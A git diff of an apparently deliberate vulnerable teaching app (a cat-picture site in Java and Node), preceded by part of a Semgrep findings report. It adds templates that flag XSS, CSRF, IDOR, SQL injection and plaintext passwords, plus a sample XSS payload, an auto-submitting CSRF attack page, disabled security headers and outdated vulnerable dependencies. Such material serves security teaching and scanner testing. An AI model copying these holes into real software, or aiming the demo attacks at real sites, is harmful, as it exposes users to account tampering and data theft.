commands."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","id":"python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","name":"python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.code.tainted-code-stdlib.tainted-code-stdlib)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://www.stackhawk.com/blog/command-injection-python/](https://www.stackhawk.com/blog/command-injection-python/)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/python.lang.code.tainted-code-stdlib.tainted-code-stdlib","id":"python.lang.code.tainted-code-stdlib.tainted-code-stdlib","name":"python.lang.code.tainted-code-stdlib.tainted-code-stdlib","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.code.tainted-code-stdlib.tainted-code-stdlib"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","id":"python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","name":"python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-httponly-false.flask-cookie-httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","id":"java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","name":"java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.net.http.httprequest-hardcoded-secret-in-request-header.httprequest-hardcoded-secret-in-request-header"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","id":"ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","name":"ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.pg.ruby-pg-empty-password.ruby-pg-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/marshal.html](https://docs.python.org/3/library/marshal.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `marshal` module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections, such as json, PyYAML, or ruamel.yaml."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","id":"python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","name":"python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-marshal-pyramid.tainted-marshal-pyramid"}}],"semanticVersion":"1.96.0"}}}],"$schema":"https://docs.oasis-open.org/sarif/sarif/v2.1.0/os/schemas/sarif-schema-2.1.0.json"} \ No newline at end of file diff --git a/insecure-java/src/main/resources/application.properties b/insecure-java/src/main/resources/application.properties index 39412a3..8048c5e 100644 --- a/insecure-java/src/main/resources/application.properties +++ b/insecure-java/src/main/resources/application.properties @@ -1 +1,26 @@ -spring.application.name=insecure-java +# Server port (optional) +server.port=8080 + +# Database configuration +spring.datasource.url=jdbc:h2:mem:testdb +spring.datasource.driverClassName=org.h2.Driver +spring.datasource.username=sa +spring.datasource.password= + +# JPA configuration +spring.jpa.database-platform=org.hibernate.dialect.H2Dialect +spring.jpa.show-sql=true +spring.jpa.hibernate.ddl-auto=create-drop +spring.jpa.open-in-view=false + +# Thymeleaf configuration +spring.thymeleaf.cache=false + +# Disable default security headers +spring.security.headers.content-security-policy=none +spring.security.headers.x-content-type-options=none +spring.security.headers.x-frame-options=none +spring.security.headers.x-xss-protection=0 + +# Context path +server.servlet.context-path=/java diff --git a/insecure-java/src/main/resources/templates/addComment.html b/insecure-java/src/main/resources/templates/addComment.html new file mode 100644 index 0000000..05b45e5 --- /dev/null +++ b/insecure-java/src/main/resources/templates/addComment.html @@ -0,0 +1,20 @@ + + + + Add Comment + + +

    Add Comment

    + +

    Note: This page is vulnerable to XSS attacks. Malicious scripts can be injected via the comment field. When you view comments, they will activate.

    +
    +
    +
    + +
    +

    Example Payload:

    +
      +
    • Comment Text: <script>alert('XSS Attack');</script>
      • +
    + + diff --git a/insecure-java/src/main/resources/templates/addCommentResult.html b/insecure-java/src/main/resources/templates/addCommentResult.html new file mode 100644 index 0000000..f146bc8 --- /dev/null +++ b/insecure-java/src/main/resources/templates/addCommentResult.html @@ -0,0 +1,11 @@ + + + + Add Comment Result + + +

    + +

    Note: The comment you added may contain scripts that execute when viewing comments.

    + + diff --git a/insecure-java/src/main/resources/templates/comments.html b/insecure-java/src/main/resources/templates/comments.html new file mode 100644 index 0000000..877b085 --- /dev/null +++ b/insecure-java/src/main/resources/templates/comments.html @@ -0,0 +1,24 @@ + + + + Comments + + +

    Comments

    + +

    Note: Deleting comments does not require any CSRF token, making it vulnerable to CSRF attacks.

    +
      +
    • + +
      + + +
      +
      • +
    +

    Example Attack:

    +
      +
    • An attacker can craft a hidden form to delete a comment without the user's knowledge.
      • +
    + + diff --git a/insecure-java/src/main/resources/templates/csrf_attack.html b/insecure-java/src/main/resources/templates/csrf_attack.html new file mode 100644 index 0000000..de4129d --- /dev/null +++ b/insecure-java/src/main/resources/templates/csrf_attack.html @@ -0,0 +1,16 @@ + + + + CSRF Attack Demo + + +

    Malicious CSRF Page

    +

    When this page loads, it will automatically submit a form to delete a comment on the Cat Picture App.

    +
    + +
    + + + diff --git a/insecure-java/src/main/resources/templates/delete.html b/insecure-java/src/main/resources/templates/delete.html new file mode 100644 index 0000000..368ebb4 --- /dev/null +++ b/insecure-java/src/main/resources/templates/delete.html @@ -0,0 +1,19 @@ + + + + Delete Picture + + +

    Delete Cat Picture

    + +

    Note: This function lacks access control. Any user can delete any picture by specifying its ID.

    +
    +
    + +
    +

    Example Payload:

    +
      +
    • Picture ID: 1
      • +
    + + diff --git a/insecure-java/src/main/resources/templates/deleteResult.html b/insecure-java/src/main/resources/templates/deleteResult.html new file mode 100644 index 0000000..c4fd704 --- /dev/null +++ b/insecure-java/src/main/resources/templates/deleteResult.html @@ -0,0 +1,11 @@ + + + + Delete Result + + +

    + +

    Note: The picture was deleted without verifying your permissions.

    + + diff --git a/insecure-java/src/main/resources/templates/editProfile.html b/insecure-java/src/main/resources/templates/editProfile.html new file mode 100644 index 0000000..7c6994b --- /dev/null +++ b/insecure-java/src/main/resources/templates/editProfile.html @@ -0,0 +1,21 @@ + + + + Edit Profile + + +

    Edit Profile

    + +

    Note: This page allows editing of user information without verifying ownership.

    +
    + +
    +
    + +
    +

    Example Payload:

    +
      +
    • Edit another user's profile by accessing the edit form with their userId, e.g., ?userId=2.
      • +
    + + diff --git a/insecure-java/src/main/resources/templates/home.html b/insecure-java/src/main/resources/templates/home.html new file mode 100644 index 0000000..ddcd205 --- /dev/null +++ b/insecure-java/src/main/resources/templates/home.html @@ -0,0 +1,183 @@ + + + + Home - Cat App + + + + + + + +
    + +
    +

    Welcome to Cat App

    +

    + Share your favorite cat pictures, leave comments, and connect with other cat lovers! +

    +

    + Welcome back, ! Ready to share more cat pictures? +

    +
    + Login + Register +
    +
    + + +
    +
    +

    Share Cat Pictures

    +

    Upload and share your favorite cat pictures with the community.

    + Browse Cats + Login to Share +
    +
    +

    Leave Comments

    +

    Engage with other users by leaving comments on their cat pictures.

    + View Comments + Login to Comment +
    +
    +

    Search Pictures

    +

    Find specific cat pictures using our search feature.

    + Search Now + Login to Search +
    +
    + + +
    + Note: This application contains intentional security vulnerabilities for educational purposes. + Please do not use this code in a production environment. +
    +
    + + diff --git a/insecure-java/src/main/resources/templates/layout.html b/insecure-java/src/main/resources/templates/layout.html new file mode 100644 index 0000000..7b74fcf --- /dev/null +++ b/insecure-java/src/main/resources/templates/layout.html @@ -0,0 +1,110 @@ + + + + Insecure Java App + + + + + + + +
    + +
    +
    +
    +
    +
    +
    + + +
    + +
    +
    + + diff --git a/insecure-java/src/main/resources/templates/login.html b/insecure-java/src/main/resources/templates/login.html new file mode 100644 index 0000000..5debda2 --- /dev/null +++ b/insecure-java/src/main/resources/templates/login.html @@ -0,0 +1,114 @@ + + + + Login - Cat App + + + + + + + +
    +
    + +
    +
    + + diff --git a/insecure-java/src/main/resources/templates/loginResult.html b/insecure-java/src/main/resources/templates/loginResult.html new file mode 100644 index 0000000..92a3dae --- /dev/null +++ b/insecure-java/src/main/resources/templates/loginResult.html @@ -0,0 +1,25 @@ + + + + Login Result + + + +

    + +
    + Note: The application does not implement secure session management, making it vulnerable to attacks. +
    +

    Redirecting to home page...

    + + + diff --git a/insecure-java/src/main/resources/templates/profile.html b/insecure-java/src/main/resources/templates/profile.html new file mode 100644 index 0000000..3fa98b5 --- /dev/null +++ b/insecure-java/src/main/resources/templates/profile.html @@ -0,0 +1,18 @@ + + + + User Profile + + +

    User Profile

    + +

    Note: This page displays user information based on the provided user ID without verifying ownership.

    +

    User ID:

    +

    Username:

    + Edit Profile +

    Example Payload:

    +
      +
    • Access another user's profile by changing the userId parameter in the URL, e.g., ?userId=2.
      • +
    + + diff --git a/insecure-java/src/main/resources/templates/register.html b/insecure-java/src/main/resources/templates/register.html new file mode 100644 index 0000000..fdff7e2 --- /dev/null +++ b/insecure-java/src/main/resources/templates/register.html @@ -0,0 +1,107 @@ + + + + Register - Cat App + + + + + + + +
    +
    +
    +

    Register

    + +
    + Note: The registration process stores passwords in plaintext and lacks proper input validation. +
    +
    +
    + + +
    +
    + + +
    + +
    +
    +
    +

    Already have an account? Login here

    +
    +
    +
    +
    + + diff --git a/insecure-java/src/main/resources/templates/registerResult.html b/insecure-java/src/main/resources/templates/registerResult.html new file mode 100644 index 0000000..fab4c55 --- /dev/null +++ b/insecure-java/src/main/resources/templates/registerResult.html @@ -0,0 +1,11 @@ + + + + Registration Result + + +

    + +

    Note: Your password is stored in plaintext. This is insecure and demonstrates a common vulnerability.

    + + diff --git a/insecure-java/src/main/resources/templates/search.html b/insecure-java/src/main/resources/templates/search.html new file mode 100644 index 0000000..5aa798b --- /dev/null +++ b/insecure-java/src/main/resources/templates/search.html @@ -0,0 +1,135 @@ + + + + Search Cats - Cat App + + + + + + + +
    +
    +
    +

    Search Cat Pictures

    + +
    + Note: This search is vulnerable to SQL injection attacks. +
    +
    +
    + + +
    + +
    +
    +
    +
    + + diff --git a/insecure-java/src/main/resources/templates/searchResults.html b/insecure-java/src/main/resources/templates/searchResults.html new file mode 100644 index 0000000..9ba307c --- /dev/null +++ b/insecure-java/src/main/resources/templates/searchResults.html @@ -0,0 +1,148 @@ + + + + Search Results - Cat App + + + + + + + +
    +
    +
    +

    Search Results

    + +
    + Note: This page is vulnerable to XSS attacks through the search results. +
    +
    +
    + +
    +
    + +
    + + +
    +
    +
    +
    +
    +
    +
    + + diff --git a/insecure-js/Dockerfile b/insecure-js/Dockerfile index 786568e..a5e5f3b 100644 --- a/insecure-js/Dockerfile +++ b/insecure-js/Dockerfile @@ -1,15 +1,16 @@ FROM node:16 -WORKDIR /usr/src/app +# Create /app directory and set as working directory +RUN mkdir /app +WORKDIR /app -COPY ./insecure-js/package*.json ./ - -RUN npm install - -RUN rm /usr/local/lib/node_modules/npm/node_modules/semver/package.json +# Copy package files first for better caching +COPY package*.json ./ +RUN npm install --legacy-peer-deps COPY . . EXPOSE 3000 -CMD [ "node", "server.js" ] +# Run the database initialization script, then start the server +CMD ["/bin/bash", "-c", "node init_db.js && node server.js"] \ No newline at end of file diff --git a/insecure-js/data.db b/insecure-js/data.db new file mode 100644 index 0000000..8e3cd42 Binary files /dev/null and b/insecure-js/data.db differ diff --git a/insecure-js/init_db.js b/insecure-js/init_db.js new file mode 100644 index 0000000..5f56277 --- /dev/null +++ b/insecure-js/init_db.js @@ -0,0 +1,86 @@ +const { Sequelize, DataTypes } = require("sequelize"); +const sequelize = new Sequelize("sqlite:./data.db", { + dialect: "sqlite", + dialectOptions: { + multipleStatements: true, // Enable multiple statements + }, +}); + +// Define User model +const User = sequelize.define("User", { + username: DataTypes.STRING, + email: DataTypes.STRING, + target: DataTypes.JSON, +}); + +// Define Password model +const Password = sequelize.define("Password", { + userId: DataTypes.INTEGER, + hashedPassword: DataTypes.STRING, +}); + +// Define Order model with sensitive fields +const Order = sequelize.define("Order", { + orderNumber: DataTypes.INTEGER, + userId: DataTypes.INTEGER, // Foreign key to associate with User + product: DataTypes.STRING, + amount: DataTypes.FLOAT, + status: DataTypes.STRING, + creditCardNumber: DataTypes.STRING, // Sensitive data + billingAddress: DataTypes.STRING, // Sensitive data +}); + +async function init() { + await sequelize.sync({ force: true }); + + // Create users + const users = await User.bulkCreate([ + { username: "admin", email: "admin@example.com", target: { admin: 1 } }, + { username: "user1", email: "user1@example.com", target: { user1: 1 } }, + { username: "user2", email: "user2@example.com", target: { user2: 1 } }, + ]); + + // Create passwords + await Password.bulkCreate([ + { userId: users[0].id, hashedPassword: "hashed_admin_password" }, + { userId: users[1].id, hashedPassword: "hashed_user1_password" }, + { userId: users[2].id, hashedPassword: "hashed_user2_password" }, + ]); + + // Create orders with sensitive data + await Order.bulkCreate([ + { + orderNumber: 1001, + userId: users[0].id, + product: "Laptop", + amount: 1500.0, + status: "Shipped", + creditCardNumber: "4111111111111111", + billingAddress: "123 Main St", + }, + { + orderNumber: 1002, + userId: users[1].id, + product: "Phone", + amount: 800.0, + status: "Pending", + creditCardNumber: "4222222222222222", + billingAddress: "456 Elm St", + }, + { + orderNumber: 1003, + userId: users[2].id, + product: "Tablet", + amount: 400.0, + status: "Delivered", + creditCardNumber: "4333333333333333", + billingAddress: "789 Oak St", + }, + ]); + + console.log("Database initialized"); +} + +init(); + +module.exports = { sequelize, User, Password, Order }; diff --git a/insecure-js/package-lock.json b/insecure-js/package-lock.json index a780b26..d165abd 100644 --- a/insecure-js/package-lock.json +++ b/insecure-js/package-lock.json @@ -5,18 +5,32 @@ "packages": { "": { "dependencies": { + "@aikidosec/firewall": "^1.5.47", + "@babel/core": "7.0.0-rc.1", + "chart.js": "2.8.0", + "chartist": "0.3.0", + "dom-iterator": "^1.0.0", + "jquery": "2.1.0", "lodash": "4.16.1", - "semver": "5.4.1" - }, - "devDependencies": { - "@babel/core": "7.0.0-rc.1" + "mini-html-parser": "^0.0.3", + "mysql2": "^2.3.3", + "semver": "5.4.1", + "sequelize": "4.44.1", + "sqlite3": "^5.0.2" + } + }, + "node_modules/@aikidosec/firewall": { + "version": "1.5.68", + "resolved": "https://registry.npmjs.org/@aikidosec/firewall/-/firewall-1.5.68.tgz", + "integrity": "sha512-bwWeLcTOzn+ZtVllJZSffoekaXxMNTznUrGb7VdxQAgN2zNBTQAmceFWRKBQB3VI8jv3LNapcWN1BXRji9Hxgg==", + "engines": { + "node": ">=16" } }, "node_modules/@babel/code-frame": { "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.0.0-rc.1.tgz", "integrity": "sha512-qhQo3GqwqMUv03SxxjcEkWtlkEDvFYrBKbJUn4Dtd9amC2cLkJ3me4iYUVSBbVXWbfbVRalEeVBHzX4aQYKnBg==", - "dev": true, "dependencies": { "@babel/highlight": "7.0.0-rc.1" } @@ -25,7 +39,6 @@ "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.0.0-rc.1.tgz", "integrity": "sha512-CvuSsq+LFs9N4SJG8MnNPI0hnl913HK1OqG3NEfejOKo+JqtVuxpmAFyXIDogX2x668xqFKAW6EQiCIcUHklMg==", - "dev": true, "dependencies": { "@babel/code-frame": "7.0.0-rc.1", "@babel/generator": "7.0.0-rc.1", @@ -46,17 +59,10 @@ "node": ">=6.9.0" } }, - "node_modules/@babel/core/node_modules/lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==", - "dev": true - }, "node_modules/@babel/generator": { "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.0.0-rc.1.tgz", "integrity": "sha512-Ak4n780/coo+L9GZUS7V/IGJilP11t4UoWl0J9cG3jso4KkDGQcqdx4Y6gJAiXng+sDfvzUmvWfM1hZwH82J0A==", - "dev": true, "dependencies": { "@babel/types": "7.0.0-rc.1", "jsesc": "^2.5.1", @@ -65,17 +71,10 @@ "trim-right": "^1.0.1" } }, - "node_modules/@babel/generator/node_modules/lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==", - "dev": true - }, "node_modules/@babel/helper-function-name": { "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.0.0-rc.1.tgz", "integrity": "sha512-fDbWxdYYbFNzcI5jn3qsPxHI1UCXwvFk0kGytGce/FEBYEPXBqycKknC8Oqiub8DzGtmTcvnqcm/cl/qxzeuiQ==", - "dev": true, "dependencies": { "@babel/helper-get-function-arity": "7.0.0-rc.1", "@babel/template": "7.0.0-rc.1", @@ -86,7 +85,6 @@ "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/helper-get-function-arity/-/helper-get-function-arity-7.0.0-rc.1.tgz", "integrity": "sha512-5+ydaIRxT42FSDqvoXIDksCGlW1903xC73HQnQCFF1YuV7VcIf+9M4+tRZulLlYlshw7ILA+4SiYsKoDlC0Irg==", - "dev": true, "dependencies": { "@babel/types": "7.0.0-rc.1" } @@ -95,7 +93,6 @@ "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.0.0-rc.1.tgz", "integrity": "sha512-hz6QmlnaBFYt4ra8DfRLCMgrI7yfwQ13kJtufSO5dVCasxmAng2LeeQiT6H4iN5TpFONcayp5f/2mXqHH/zn/g==", - "dev": true, "dependencies": { "@babel/types": "7.0.0-rc.1" } @@ -104,7 +101,6 @@ "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.0.0-rc.1.tgz", "integrity": "sha512-4+AkDbZ0Usr7mNH4wGX8fVx4WJzHdrcjRkJy52EIWyBAQEoKqb5HXca1VjejWtnVwaGwW7zk/h6oQ9FQPywQfA==", - "dev": true, "dependencies": { "@babel/template": "7.0.0-rc.1", "@babel/traverse": "7.0.0-rc.1", @@ -115,7 +111,6 @@ "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.0.0-rc.1.tgz", "integrity": "sha512-5PgPDV6F5s69XNznTcP0za3qH7qgBkr9DVQTXfZtpF+3iEyuIZB1Mjxu52F5CFxgzQUQJoBYHVxtH4Itdb5MgA==", - "dev": true, "dependencies": { "chalk": "^2.0.0", "esutils": "^2.0.2", @@ -126,7 +121,6 @@ "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.0.0-rc.1.tgz", "integrity": "sha512-rC+bIz2eZnJlacERmJO25UAbXVZttcSxh0Px0gRGinOTzug5tL7+L9urfIdSWlv1ZzP03+f2xkOFLOxZqSsVmQ==", - "dev": true, "bin": { "parser": "bin/babel-parser.js" }, @@ -138,7 +132,6 @@ "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.0.0-rc.1.tgz", "integrity": "sha512-gPLng2iedNlkaGD0UdwaUByQXK8k4bnaoq2RH5JgR2mqHvh2RyjkDdaMbZFlSss1Iu8+PrXwbIRworTl8iRqbA==", - "dev": true, "dependencies": { "@babel/code-frame": "7.0.0-rc.1", "@babel/parser": "7.0.0-rc.1", @@ -146,17 +139,10 @@ "lodash": "^4.17.10" } }, - "node_modules/@babel/template/node_modules/lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==", - "dev": true - }, "node_modules/@babel/traverse": { "version": "7.0.0-rc.1", "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.0.0-rc.1.tgz", "integrity": "sha512-lNOpJ5xzakg+fCobQQHdeDRYeN54b+bAZpeTYMeeYPAvN+hTldg9/FSNKYEMRs5EWoQ0Yt74gwq98InSORdSDQ==", - "dev": true, "dependencies": { "@babel/code-frame": "7.0.0-rc.1", "@babel/generator": "7.0.0-rc.1", @@ -169,34 +155,141 @@ "lodash": "^4.17.10" } }, - "node_modules/@babel/traverse/node_modules/lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": 